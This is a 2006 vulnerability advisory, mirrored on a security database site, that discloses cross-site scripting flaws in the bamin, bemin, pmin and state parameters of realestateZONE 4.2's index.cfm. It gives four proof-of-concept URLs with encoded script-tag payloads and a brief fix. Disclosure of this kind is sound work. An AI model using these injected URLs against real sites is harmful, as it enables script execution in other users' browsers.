Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11982
HistoryMar 28, 2006 - 12:00 a.m.

realestateZONE 4.2 Multiple XSS vuln.

2006-03-2800:00:00
vulners.com
9

realestateZONE 4.2 Multiple XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 28 march 2006
vendor:http://www.fusionzone.com/applications/realestate/
affected versions:v.4.2 and prior
original advisory:http://pridels.blogspot.com/2006/03/realestatezone-42-multiple-xss-vuln.html
###############################################

Vuln. Description:

realestateZONE contains a flaw that allows a remote cross site
scripting attack. This flaw exists because input passed to "bamin"
"bemin" "pmin" "state" paremter in "index.cfm" isn't properly
sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server, leading to a loss of
integrity.

examples:

/index.cfm?pg=278&redir=listings&ui=&bamin=%22%3Cscript
%3Ealert('r0t')%3C/script%3E

/index.cfm?pg=278&redir=listings&ui=&bamin=0&bemin=%22%
3Cscript%3Ealert('r0t')%3C/script%3E

/index.cfm?pg=278&redir=listings&ui=&bamin=0&bemin=0&pmi
n=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/index.cfm?pg=278&redir=listings&ui=&bamin=0&bemin=0&pmi
n=0&pmax=99999999&zc=&city=&state=%22%3Cscript%3Ealert('
r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/